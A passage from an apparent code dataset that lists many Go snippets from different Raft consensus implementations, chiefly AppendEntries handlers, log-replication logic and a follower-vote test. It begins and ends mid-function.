lastLogEntry.LastLogTerm != args.PreviousLogTerm {\n\t\t\treply.Success = false\n\t\t\t//Reduce size by 1;\n\t\t\trf.debug(\"3 \\n\")\n\t\t\trf.log = rf.log[:len(rf.log)-1]\n\t\t\treturn\n\t\t}\n\n\t\t// 4 We are good to apply the command.\n\t\trf.printSlice(rf.log, \"Before\")\n\t\trf.debug(\"Printing the entry to be added within the handler %v\", args.LogEntries)\n\t\trf.log = append(rf.log, args.LogEntries...)\n\t\trf.printSlice(rf.log, \"After\")\n\t\trf.debug(\"\\n Applied the command to the log. Log size is -->%d \\n\", len(rf.log))\n\t\t//5\n\t}\n\tif args.LeaderCommit >rf.commitIndex {\n\t\trf.debug(\"5 Update commitIndex. LeaderCommit %v rf.commitIndex %v \\n\",args.LeaderCommit,rf.commitIndex )\n\t\t//Check whether all the entries are committed prior to this.\n\t\toldCommitIndex:=rf.commitIndex\n\t\trf.commitIndex = min(args.LeaderCommit,lastLogEntryIndex+1)\n\t\trf.debug(\"moving ci from %v to %v\", oldCommitIndex, rf.commitIndex)\n\t\t//Send all the received entries into the channel\n\t\tj:=0\n\t\tfor i:=oldCommitIndex ;i<args.LeaderCommit;i++ {\n\t\t\trf.debug(\"Committing %v \",i)\n\t\t\tapplyMsg := ApplyMsg{CommandValid: true, Command: rf.log[i].Command, CommandIndex: i}\n\t\t\tj++\n\t\t\trf.debug(\"Sent a response to the end client \")\n\t\t\trf.debug(\"applyMsg %v\",applyMsg)\n\t\t\trf.applyCh <- applyMsg\n\t\t}\n\t}\n\treply.Success = true\n\t//Check at the last. This is because this way the first HB will be sent immediately.\n\t//timer := time.NewTimer(100 * time.Millisecond)\n}", "func (rf *Raft) updateNextIndexWhenAppendEntriesFail(server int, reply *AppendEntriesReply) {\n\t//lastTryIndex := rf.nextIndex[server]\n\tif reply.SuggestPrevLogIndex < rf.snapshotIndex {\n\t\t// suggestPrevLogIndex+1 is the one that should be the first entry in AppendEntries\n\t\t// If suggestPrevLogIndex+1 <= rf.snapshotIndex, then we cannot find the entry\n\n\t\t// the next time will send snapshotIndex\n\t\t// including index==0 && term==0 when rf.snapshotIndex>0 ?\n\t\trf.nextIndex[server] = rf.snapshotIndex\n\t} else if rf.getTermForIndex(reply.SuggestPrevLogIndex) == reply.SuggestPrevLogTerm {\n\t\t// including index==0 && term==0 when rf.snapshotIndex==0 ?\n\t\trf.nextIndex[server] = reply.SuggestPrevLogIndex + 1\n\t} else if rf.getTermForIndex(reply.SuggestPrevLogIndex) > reply.SuggestPrevLogTerm {\n\t\tnpi := reply.SuggestPrevLogIndex\n\t\tfor ; npi >= rf.snapshotIndex+1 && rf.getTermForIndex(npi) > reply.SuggestPrevLogTerm; npi-- {\n\t\t}\n\t\trf.nextIndex[server] = npi + 1\n\t} else {\n\t\tAssertF(reply.SuggestPrevLogIndex >= rf.snapshotIndex+1,\n\t\t\t\"reply.SuggestPrevLogIndex {%d} >= rf.snapshotIndex+1 {%d}\",\n\t\t\treply.SuggestPrevLogIndex, rf.snapshotIndex+1)\n\t\trf.nextIndex[server] = reply.SuggestPrevLogIndex\n\t}\n\n\tRaftDebug(\"SendAppendEntries failed to %d ++: rf.nextIndex[%d]=%d\",\n\t\trf, server, server, rf.nextIndex[server])\n\n\tAssertF(rf.nextIndex[server] >= rf.snapshotIndex && rf.nextIndex[server] <= rf.getLastIndex()+1, \"\")\n\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tDPrintf(\"hear beat from %v\", args.LeaderId)\n\treply.Term = rf.currentTerm\n\tif rf.currentTerm <= args.Term {\n\t\trf.resetTimer()\n\t}\n\tif rf.currentTerm < args.Term {\n\t\trf.raftState = Follower\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\trf.persist()\n\t}\n\n\t//rf currentTerm is more update\n\tif args.Term < rf.currentTerm {\n\t\treply.Success = false\n\t\treturn\n\t}\n\tif args.PrevLogIndex < rf.lastIncludedIndex{\n\t\treply.Success = false\n\t\treply.ConflictIndex = rf.lastIncludedIndex + 1\n\t\treturn\n\t}\n\t//if args.PrevLogIndex > 50 {\n\t//DPrintf(\"args is %v, me is %v log len is %v rf lastincluded is %v case: %v\"+\n\t//\t\" commitIndex is %v log is %v\", args, rf.me, len(rf.log), rf.lastIncludedIndex,\n\t//\tlen(rf.log)-1 < rf.subLastIncludedIndex(args.PrevLogIndex), rf.commitIndex, rf.log)\n\t//}\n\t//DPrintf(\"from %v me is %v lastincludeindex is %v args prev is %v\",\n\t//\targs.LeaderId, rf.me, rf.lastIncludedIndex, args.PrevLogIndex)\n\tif len(rf.log)-1 < rf.subLastIncludedIndex(args.PrevLogIndex) ||\n\t\t(rf.log[rf.subLastIncludedIndex(args.PrevLogIndex)].Term != args.PrevLogTerm &&\n\t\t\trf.subLastIncludedIndex(args.PrevLogIndex) != 0) {\n\t\treply.Success = false\n\t\tif len(rf.log)-1 < rf.subLastIncludedIndex(args.PrevLogIndex){\n\t\t\treply.ConflictIndex = rf.addLastIncludedIndex(len(rf.log))\n\t\t} else{\n\t\t\t//faster moving by term, not index, return last index of last term\n\t\t\treply.ConflictTerm = rf.log[rf.subLastIncludedIndex(args.PrevLogIndex)].Term\n\t\t\tfor i := rf.subLastIncludedIndex(args.PrevLogIndex); i >= 0; i--{\n\t\t\t\tif rf.log[i].Term == rf.log[rf.subLastIncludedIndex(args.PrevLogIndex)].Term{\n\t\t\t\t\treply.ConflictIndex = rf.addLastIncludedIndex(i)\n\t\t\t\t}else{\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\n\t//when hit this branch mean in PrevLogIndex all commits are matched with the leader\n\t//delete entries not match the PreLogIndex\n\n\t//if len(rf.log) >= args.PrevLogIndex + len(args.Entries){\n\t//\tisMatch := true\n\t//\tfor i := 0; i < len(args.Entries); i++ {\n\t//\t\tif args.Entries[i] != rf.log[i+args.PrevLogIndex+1] {\n\t//\t\t\tisMatch = false\n\t//\t\t}\n\t//\t}\n\t//\tif isMatch == false{\n\t//\t\trf.log = rf.log[0 : args.PrevLogIndex+1]\n\t//\t\trf.log = append(rf.log, args.Entries...)\n\t//\t}\n\t//}else {\n\t//\trf.log = rf.log[0 : args.PrevLogIndex+1]\n\t//\trf.log = append(rf.log, args.Entries...)\n\t//}\n\n\trf.log = rf.log[0 : rf.subLastIncludedIndex(args.PrevLogIndex+1)]\n\treply.Success = true\n\trf.log = append(rf.log, args.Entries...)\n\tif args.LeaderCommit > rf.commitIndex {\n\t\tcommitIndex := min(args.LeaderCommit, rf.addLastIncludedIndex(len(rf.log)-1))\n\t\trf.commitIndex = commitIndex\n\t\trf.notifyApplyCh <- struct{}{}\n\t\t//DPrintf(\"inner appendentires me is %v rf commitindex is %v, args.Leadercommit is %v, \" +\n\t\t//\t\"lastincludedindex is %v log len is %v\", rf.me, rf.commitIndex,\n\t\t//\targs.LeaderCommit, rf.lastIncludedIndex, len(rf.log))\n\t}\n\trf.persist()\n}", "func (rf *Raft) sendAppendEntriesToMultipleFollowers() {\n for !rf.killed() {\n rf.mu.Lock()\n if rf.state != \"Leader\" {\n DLCPrintf(\"Server (%d) is no longer Leader and stop sending Heart Beat\", rf.me)\n rf.mu.Unlock()\n return\n }\n\n for i := 0; i < len(rf.peers) && rf.state == \"Leader\"; i++ {\n if i == rf.me {\n continue\n }else{\n if rf.nextIndex[i] <= rf.snapshottedIndex {\n go rf.sendInstallSnapshotToOneFollower(i, rf.log[0].Term)\n }else{\n go rf.sendAppendEntriesToOneFollower(i)\n }\n }\n }\n if rf.state != \"Leader\" {\n DLCPrintf(\"Server (%d) is no longer Leader and stop sending Heart Beat\", rf.me)\n rf.mu.Unlock()\n return\n }\n rf.commitEntries()\n rf.mu.Unlock()\n\n time.Sleep(100 * time.Millisecond)\n }\n}", "func (r *Raft) handleAppendEntries(m pb.Message) {\n\n\tvar prevPosition = -1\n\tif len(r.RaftLog.entries) == 0 || m.Index < r.RaftLog.entries[0].Index {\n\t\tterm, err := r.RaftLog.storage.Term(m.Index)\n\t\tif err != nil || term != m.LogTerm {\n\t\t\tr.appendMsg(r.buildReject(pb.MessageType_MsgAppendResponse, m.From))\n\t\t\treturn\n\t\t}\n\t} else {\n\t\t//reject if prevPosition entry not findLastMatch\n\t\tvar found bool\n\t\tprevPosition, found = r.RaftLog.findByIndex(m.Index)\n\t\tif !found || r.RaftLog.entries[prevPosition].Term != m.LogTerm {\n\t\t\tr.appendMsg(r.buildReject(pb.MessageType_MsgAppendResponse, m.From))\n\t\t\treturn\n\t\t}\n\t}\n\n\toffset := 0\n\tfor ; offset < len(m.Entries); offset++ {\n\t\tif offset+prevPosition+1 >= len(r.RaftLog.entries) {\n\t\t\tr.RaftLog.append(m.Entries[offset:])\n\t\t\tbreak\n\t\t}\n\t\te1 := r.RaftLog.entries[offset+prevPosition+1]\n\t\te2 := m.Entries[offset]\n\t\tif e1.Index != e2.Index || e1.Term != e2.Term {\n\t\t\tr.RaftLog.entries = r.RaftLog.entries[:offset+prevPosition+1]\n\t\t\tif len(r.RaftLog.entries) > 0 {\n\t\t\t\tlastIndexInLog := r.RaftLog.entries[len(r.RaftLog.entries)-1].Index\n\t\t\t\tif lastIndexInLog < r.RaftLog.stabled {\n\t\t\t\t\tr.RaftLog.stabled = lastIndexInLog\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tr.RaftLog.stabled = 0\n\t\t\t}\n\t\t\tr.RaftLog.append(m.Entries[offset:])\n\t\t\tbreak\n\t\t}\n\t}\n\n\tmsg := r.buildMsgWithoutData(pb.MessageType_MsgAppendResponse, m.From, false)\n\tmsg.Index = r.RaftLog.LastIndex()\n\tr.appendMsg(msg)\n\n\t// update committed\n\tlastIndex := lastIndexInMeg(m)\n\tif m.Commit > r.RaftLog.committed && lastIndex > r.RaftLog.committed {\n\t\tr.RaftLog.committed = min(m.Commit, lastIndex)\n\t}\n\n\t// Your Code Here (2A).\n}", "func (r *Raft) AppendToLog_Follower(request AppendEntriesReq) {\n\tterm := request.term\n\tcmd := request.entries\n\tindex := request.prevLogIndex + 1\n\tlogVal := LogVal{term, cmd, 0} //make object for log's value field\n\n\tif len(r.myLog) == index {\n\t\tr.myLog = append(r.myLog, logVal) //when trying to add a new entry\n\t} else {\n\t\tr.myLog[index] = logVal //overwriting in case of log repair\n\t\t//fmt.Println(\"Overwiriting!!\")\n\t}\n\t//fmt.Println(r.myId(), \"Append to log\", string(cmd))\n\t//modify metadata after appending\n\t//r.myMetaData.lastLogIndex = r.myMetaData.lastLogIndex + 1\n\t//r.myMetaData.prevLogIndex = r.myMetaData.lastLogIndex\n\t//\tif len(r.myLog) == 1 {\n\t//\t\tr.myMetaData.prevLogTerm = r.myMetaData.prevLogTerm + 1\n\t//\t} else if len(r.myLog) > 1 {\n\t//\t\tr.myMetaData.prevLogTerm = r.myLog[r.myMetaData.prevLogIndex].Term\n\t//\t}\n\n\t//Changed on 4th april, above is wrong in case of overwriting of log\n\tr.myMetaData.lastLogIndex = index\n\tr.myMetaData.prevLogIndex = index - 1\n\tif index == 0 {\n\t\tr.myMetaData.prevLogTerm = r.myMetaData.prevLogTerm + 1 //or simple -1\n\t} else if index >= 1 {\n\t\tr.myMetaData.prevLogTerm = r.myLog[index-1].Term\n\t}\n\n\t//Update commit index\n\tleaderCI := float64(request.leaderCommitIndex)\n\tmyLI := float64(r.myMetaData.lastLogIndex)\n\tif request.leaderCommitIndex > r.myMetaData.commitIndex {\n\t\tif myLI == -1 { //REDUNDANT since Append to log will make sure it is never -1,also must not copy higher CI if self LI is -1\n\t\t\tr.myMetaData.commitIndex = int(leaderCI)\n\t\t} else {\n\t\t\tr.myMetaData.commitIndex = int(math.Min(leaderCI, myLI))\n\t\t}\n\t}\n\t//fmt.Println(r.myId(), \"My CI is:\", r.myMetaData.commitIndex)\n\tr.WriteLogToDisk()\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\tif rf.state != Follower {\n\t\t\trf.convertToFollower(rf.currentTerm, rf.votedFor)\n\t\t}\n\t}\n\n\treply.Term = rf.currentTerm\n\n\tif args.Term < rf.currentTerm {\n\t\treply.Success = false\n\t} else if len(rf.log) <= args.PrevLogIndex {\n\t\treply.Success = false\n\t\treply.ConflictIndex = len(rf.log) - 1\n\t\treply.ConflictTerm = -1\n\t} else if args.PrevLogIndex == -1 {\n\t\treply.Success = true\n\t} else if rf.log[args.PrevLogIndex].Term != args.PrevLogTerm {\n\t\treply.Success = false\n\n\t\tprevLogTerm := -1\n\t\tif args.PrevLogIndex >= 0 {\n\t\t\tprevLogTerm = rf.log[args.PrevLogIndex].Term\n\t\t}\n\t\tif args.PrevLogTerm != prevLogTerm {\n\t\t\treply.ConflictTerm = prevLogTerm\n\t\t\tfor i := 0; i < len(rf.log); i++ {\n\t\t\t\tif rf.log[i].Term == prevLogTerm {\n\t\t\t\t\treply.ConflictIndex = i\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t} else {\n\t\treply.Success = true\n\t}\n\n\tif reply.Success {\n\t\tfor i := 0; i < len(args.Entries); i++ {\n\t\t\tif args.PrevLogIndex+i+1 >= len(rf.log) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tif rf.log[args.PrevLogIndex+i+1].Term != args.Entries[i].Term {\n\t\t\t\trf.log = rf.log[:args.PrevLogIndex+i]\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif args.PrevLogIndex < len(rf.log) {\n\t\t\tfor i := 0; i < len(args.Entries); i++ {\n\t\t\t\tif args.PrevLogIndex+i+1 >= len(rf.log) {\n\t\t\t\t\trf.log = append(rf.log, args.Entries[i])\n\t\t\t\t} else {\n\t\t\t\t\trf.log[args.PrevLogIndex+i+1] = args.Entries[i]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tif args.LeaderCommit > rf.committedIndex {\n\t\t\tif args.LeaderCommit > args.PrevLogIndex+len(args.Entries) {\n\t\t\t\trf.committedIndex = args.PrevLogIndex + len(args.Entries)\n\t\t\t} else {\n\t\t\t\trf.committedIndex = args.LeaderCommit\n\t\t\t}\n\t\t\tif rf.committedIndex >= len(rf.log) {\n\t\t\t\trf.committedIndex = len(rf.log) - 1\n\t\t\t}\n\t\t}\n\t\trf.startApplyLogs()\n\t}\n\n\trf.persist()\n\n\tgo func() {\n\t\tselect {\n\t\tcase <-rf.heartBeatCh:\n\t\tdefault:\n\t\t}\n\t\trf.heartBeatCh <- true\n\t}()\n\n}", "func (r *Raft) AppendToLog_Follower(request AppendEntriesReq) {\n\tTerm := request.LeaderLastLogTerm\n\tcmd := request.Entries\n\tindex := request.PrevLogIndex + 1\n\tlogVal := LogVal{Term, cmd, 0} //make object for log's value field\n\n\tif len(r.MyLog) == index {\n\t\tr.MyLog = append(r.MyLog, logVal) //when trying to add a new entry\n\t} else {\n\t\tr.MyLog[index] = logVal //overwriting in case of log repair\n\t}\n\n\tr.MyMetaData.LastLogIndex = index\n\tr.MyMetaData.PrevLogIndex = index - 1\n\tif index == 0 {\n\t\tr.MyMetaData.PrevLogTerm = r.MyMetaData.PrevLogTerm + 1 //or simple -1\n\t} else if index >= 1 {\n\t\tr.MyMetaData.PrevLogTerm = r.MyLog[index-1].Term\n\t}\n\tleaderCI := float64(request.LeaderCommitIndex) //Update commit index\n\tmyLI := float64(r.MyMetaData.LastLogIndex)\n\tif request.LeaderCommitIndex > r.MyMetaData.CommitIndex {\n\t\tr.MyMetaData.CommitIndex = int(math.Min(leaderCI, myLI))\n\t}\n\tr.WriteLogToDisk()\n}", "func (handler *RuleHandler) FollowerOnAddServer(msg iface.MsgAddServer, log iface.RaftLog, status iface.Status) []interface{} {\n\t// leader should be responsible for this\n\treturn []interface{}{iface.ReplyNotLeader{}}\n}", "func TestFollowerVote(t *testing.T) {\n\ttests := []struct {\n\t\tvote uint64\n\t\tnvote uint64\n\t\twreject bool\n\t}{\n\t\t{None, 1, false},\n\t\t{None, 2, false},\n\t\t{1, 1, false},\n\t\t{2, 2, false},\n\t\t{1, 2, true},\n\t\t{2, 1, true},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Term: 1, Vote: tt.vote})\n\n\t\tr.Step(pb.Message{From: tt.nvote, FromGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTerm: 1, Type: pb.MsgVote})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: tt.nvote, ToGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\t\tTerm: 1, Type: pb.MsgVoteResp, Reject: tt.wreject},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = %v, want %v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func (r *RaftNode) AppendEntries(ae AppendEntriesStruct, response *RPCResponse) error {\n\tr.Lock()\n\tdefer r.Unlock()\n\tif r.verbose {\n\t\tlog.Printf(\"AppendEntries(). ae: %s\", ae.String())\n\t\tlog.Printf(\"My log: %s\", r.Log.String())\n\t}\n\n\tresponse.Term = r.CurrentTerm\n\n\tif ae.LeaderID == r.currentLeader {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"AppendEntries from leader - reset tickers\")\n\t\t}\n\t\tr.resetTickers()\n\t}\n\n\t// Reply false if term < currentTerm\n\tif ae.Term < r.CurrentTerm {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"AE from stale term\")\n\t\t}\n\t\tresponse.Term = r.CurrentTerm\n\t\tresponse.Success = false\n\t\treturn nil\n\t}\n\n\t// NOTE - shifting to follower each time might sound misleading, but keeps things uniform\n\tr.shiftToFollower(ae.Term, ae.LeaderID)\n\n\t// Reply false if log doesn't contain an entry at prevLogIndex whose term matches prevLogTerm\n\tif int(ae.PrevLogIndex) >= len(r.Log) || // index out-of-bounds\n\t\tr.Log[ae.PrevLogIndex].Term != ae.PrevLogTerm {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"my PrevLogTerm does not match theirs\")\n\t\t}\n\t\tresponse.Term = r.CurrentTerm\n\t\tresponse.Success = false\n\t\treturn nil\n\t}\n\n\t// If an existing entry conflicts with a new one (same index, but different terms),\n\t// delete the existing entry and all that follow it\n\tif r.verbose {\n\t\tlog.Println(\"Applying entries...\")\n\t}\n\toffset := int(ae.PrevLogIndex) + 1\n\tfor i, entry := range ae.Entries {\n\t\tif i+offset >= len(r.Log) { // We certainly have no conflict\n\t\t\tif r.verbose {\n\t\t\t\tlog.Printf(\"Apply without conflict: index=%d\", i+offset)\n\t\t\t}\n\t\t\tr.append(entry)\n\t\t} else {\n\t\t\tif r.Log[i+offset].Term != ae.Entries[i].Term { // We have conflicting entry\n\t\t\t\tif r.verbose {\n\t\t\t\t\tlog.Printf(\"Conflict - delete suffix! (we have term=%d, they have term=%d). Delete our log from index=%d onwards.\", r.Log[i+offset].Term, ae.Entries[i].Term, i+offset)\n\t\t\t\t}\n\t\t\t\tr.Log = r.Log[:i+offset] // delete the existing entry and all that follow it\n\t\t\t\tr.append(entry) // append the current entry\n\t\t\t\tlog.Printf(\"\\n\\nLog: %s\\n\\n\", stringOneLog(r.Log))\n\t\t\t} else if r.Log[i+offset] != entry {\n\t\t\t\tlog.Printf(\"\\nOURS: %s\\n\\nTHEIRS: %s\", r.Log[i+offset].String(), entry.String())\n\t\t\t\tpanic(\"log safety violation occurred somewhere\")\n\t\t\t}\n\t\t}\n\t}\n\n\tresponse.Success = true\n\tlastIndex := r.getLastLogIndex()\n\n\t// Now we need to decide how to set our local commit index\n\tif ae.LeaderCommit > r.commitIndex {\n\t\tr.commitIndex = min(lastIndex, ae.LeaderCommit)\n\t}\n\tr.executeLog()\n\tr.persistState()\n\treturn nil\n}", "func (rf *Raft) sendAppendEntries(peerIdx int) {\n\tRPCTimer := time.NewTimer(RPCTimeout)\n\tdefer RPCTimer.Stop()\n\n\tfor !rf.killed() {\n\t\trf.mu.Lock()\n\t\tif rf.role != Leader { // 不是 Leader, 直接结束\n\t\t\trf.resetHeartBeatTimer(peerIdx)\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t}\n\t\targs := rf.getAppendEntriesArgs(peerIdx)\n\t\trf.resetHeartBeatTimer(peerIdx)\n\t\trf.mu.Unlock()\n\n\t\tRPCTimer.Stop()\n\t\tRPCTimer.Reset(RPCTimeout)\n\t\treply := AppendEntriesReply{} // RPC 返回reply\n\t\tresCh := make(chan bool, 1) // call result\n\t\tgo func(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\t\t\tok := rf.peers[peerIdx].Call(\"Raft.AppendEntries\", args, reply)\n\t\t\tif !ok {\n\t\t\t\ttime.Sleep(time.Millisecond * 10)\n\t\t\t}\n\t\t\tresCh <- ok\n\t\t}(&args, &reply)\n\n\t\tselect {\n\t\tcase <-RPCTimer.C: // RPC 超时\n\t\t\tcontinue\n\t\tcase ok := <-resCh:\n\t\t\tif !ok { // RPC 失败\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\t// call ok, check reply\n\t\trf.mu.Lock()\n\t\tif rf.currentTerm != args.Term { // 不是 Leader, 或者 Term 不匹配\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t} else if reply.Term > rf.currentTerm { // Election Restriction: 有更加新的 Term, 直接拒绝\n\t\t\trf.changeRole(Follower)\n\t\t\trf.resetElectionTimer()\n\t\t\trf.currentTerm = reply.Term\n\t\t\trf.persist()\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t} else if reply.Success { // reply 成功\n\t\t\tif reply.NextIndex > rf.nextIndex[peerIdx] {\n\t\t\t\trf.nextIndex[peerIdx] = reply.NextIndex\n\t\t\t\trf.matchIndex[peerIdx] = reply.NextIndex - 1\n\t\t\t}\n\t\t\tif len(args.Entries) > 0 && args.Entries[len(args.Entries)-1].Term == rf.currentTerm {\n\t\t\t\t// 只 commit 自己 term 的 index\n\t\t\t\trf.updateCommitIndex()\n\t\t\t}\n\t\t\trf.persist()\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t} else if reply.NextIndex != 0 { // reply 失败\n\t\t\tif reply.NextIndex > rf.lastSnapshotIndex {\n\t\t\t\t// need retry\n\t\t\t\trf.nextIndex[peerIdx] = reply.NextIndex\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tcontinue\n\t\t\t} else {\n\t\t\t\t// send snapshot rpc\n\t\t\t\tgo rf.sendInstallSnapshot(peerIdx)\n\t\t\t\trf.mu.Unlock()\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\t// 乱序\n\t\t\trf.mu.Unlock()\n\t\t}\n\t}\n}", "func (r *Raft) handleAppendEntries(m pb.Message) {\n\tif m.Term != None && m.Term < r.Term {\n\t\tr.sendAppendResponse(m.From, true, None, None)\n\t\treturn\n\t}\n\tr.electionElapsed = 0\n\tr.randomElectionTimeout = r.electionTimeout + rand.Intn(r.electionTimeout)\n\tr.Lead = m.From\n\tl := r.RaftLog\n\tlastIndex := l.LastIndex()\n\tif m.Index > lastIndex {\n\t\tr.sendAppendResponse(m.From, true, None, lastIndex+1)\n\t\treturn\n\t}\n\tif m.Index >= l.FirstIndex {\n\t\tlogTerm, err := l.Term(m.Index)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tif logTerm != m.LogTerm {\n\t\t\tindex := l.toEntryIndex(sort.Search(l.toSliceIndex(m.Index+1),\n\t\t\t\tfunc(i int) bool { return l.entries[i].Term == logTerm }))\n\t\t\tr.sendAppendResponse(m.From, true, logTerm, index)\n\t\t\treturn\n\t\t}\n\t}\n\n\tfor i, entry := range m.Entries {\n\t\tif entry.Index < l.FirstIndex {\n\t\t\tcontinue\n\t\t}\n\t\tif entry.Index <= l.LastIndex() {\n\t\t\tlogTerm, err := l.Term(entry.Index)\n\t\t\tif err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t\tif logTerm != entry.Term {\n\t\t\t\tidx := l.toSliceIndex(entry.Index)\n\t\t\t\tl.entries[idx] = *entry\n\t\t\t\tl.entries = l.entries[:idx+1]\n\t\t\t\tl.stabled = min(l.stabled, entry.Index-1)\n\t\t\t}\n\t\t} else {\n\t\t\tn := len(m.Entries)\n\t\t\tfor j := i; j < n; j++ {\n\t\t\t\tl.entries = append(l.entries, *m.Entries[j])\n\t\t\t}\n\t\t\tbreak\n\t\t}\n\t}\n\tif m.Commit > l.committed {\n\t\tl.committed = min(m.Commit, m.Index+uint64(len(m.Entries)))\n\t}\n\tr.sendAppendResponse(m.From, false, None, l.LastIndex())\n}", "func (rf *Raft) sendAppendEntries(server int, args *AppendEntriesArgs, reply *AppendEntriesReply) bool {\n\targs.LeaderID = rf.me\n\n\t// figure out prevLogIndex based on entries passed in\n\t// otherwise they are the commit index of the leader if we are sending no logs\n\t// (so leader still finds out we're behind)\n\t// otherwise defaults to 0\n\tif len(args.LogEntries) > 0 && args.LogEntries[0].Index != 1 {\n\t\targs.PrevLogIndex = args.LogEntries[0].Index - 1\n\t} else if len(args.LogEntries) == 0 && rf.commitIndex > 0 {\n\t\targs.PrevLogIndex = rf.commitIndex\n\t}\n\n\t// if we have a nonzero PrevLogIndex (i.e. the condition above just set it),\n\t// retrieve it either from our log or our snapshot\n\tif args.PrevLogIndex > 0 {\n\t\traftLogIdx := rf.getTrimmedLogIndex(args.PrevLogIndex)\n\t\tif raftLogIdx == -1 {\n\t\t\trf.Log(LogDebug, \"AppendEntries retrieving PrevLogTerm from snapshot since index\", args.PrevLogIndex, \"not present in log\")\n\t\t\targs.PrevLogTerm = rf.lastIncludedTerm\n\t\t} else {\n\t\t\targs.PrevLogTerm = rf.log[raftLogIdx].Term\n\t\t}\n\t}\n\n\tok := rf.peers[server].Call(\"Raft.AppendEntries\", args, reply)\n\treturn ok\n}", "func (node *Node) AppendEntries(args AppendEntriesArgs, reply *AppendEntriesReply) error {\n\tnode.mu.Lock()\n\tdefer node.mu.Unlock()\n\n\tif node.state == dead {\n\t\treturn nil\n\t}\n\n\tlog.Printf(\"AppendEntries args: %+v\\ncurrentTerm=%d\\n\", args, node.currentTerm)\n\t// If the AppendEntries RPC is from a higher term then both followers and\n\t// candidates need to be reset.\n\tif args.term > node.currentTerm {\n\t\tnode.updateStateToFollower(args.term)\n\t}\n\n\tif args.term == node.currentTerm {\n\t\tif node.state != follower {\n\t\t\tnode.updateStateToFollower(args.term)\n\t\t}\n\t\t// Reset election timer since we have received a heartbeat from the leader.\n\t\tnode.timeSinceTillLastReset = time.Now()\n\n\t\t// Compare prevLogIndex and prevLogTerm with our own log.\n\t\tif args.prevLogIndex == -1 || (args.prevLogIndex < len(node.log) && args.prevLogTerm == node.log[args.prevLogIndex].term) {\n\t\t\treply.success = true\n\n\t\t\t// Find an existing entry that conflicts with the leader sent entries, and remove everything from it till the end.\n\t\t\tnodeLogIndex := args.prevLogIndex + 1\n\t\t\tleaderLogIndex := 0\n\t\t\tfor {\n\t\t\t\tif nodeLogIndex >= len(node.log) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\tif leaderLogIndex >= len(args.entries) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\t// Found a mismatch so we need to overwrite from this index onwards.\n\t\t\t\tif args.entries[leaderLogIndex].term != node.log[nodeLogIndex].term {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\tnodeLogIndex++\n\t\t\t\tleaderLogIndex++\n\t\t\t}\n\n\t\t\t// There are still some log entries which the leader needs to inform us about.\n\t\t\tif leaderLogIndex < len(args.entries) {\n\t\t\t\tlog.Printf(\"The node %d has an old log %+v\", node.id, node.log)\n\t\t\t\tnode.log = append(node.log[:nodeLogIndex], args.entries[leaderLogIndex:]...)\n\t\t\t\tlog.Printf(\"The node %d has a new log %+v\", node.id, node.log)\n\t\t\t}\n\n\t\t\tif args.leaderCommit > node.commitIndex {\n\t\t\t\tnode.commitIndex = intMin(args.leaderCommit, len(node.log)-1)\n\t\t\t\tlog.Printf(\"The commit index node %d has been changed to %d\", node.id, node.commitIndex)\n\t\t\t\t// Indicate to the client that this follower has committed new entries.\n\t\t\t}\n\t\t}\n\n\t\treply.success = true\n\t}\n\treply.term = node.currentTerm\n\t// By default but for readabilty.\n\treply.success = false\n\tlog.Printf(\"AppendEntries reply: %+v\", reply)\n\treturn nil\n}", "func (c PeerRpc) AddFollower(msg node.ModFollowerListMsg, _ignored *string) error {\n\terr := node.ModifyFollowerList(msg, true)\n\treturn err\n}", "func appendEntriesUntilSuccess(raft *spec.Raft, PID int) *responses.Result {\n var result *responses.Result\n var retries int\n\n // If last log index >= nextIndex for a follower,\n // send log entries starting at nextIndex.\n // (??) Otherwise set NextIndex[PID] to len(raft.Log)-1\n if len(raft.Log)-1 < raft.NextIndex[PID] {\n log.Printf(\"[PUTENTRY-X]: [len(raft.Log)-1=%d] [raft.NextIndex[PID]=%d]\\n\", 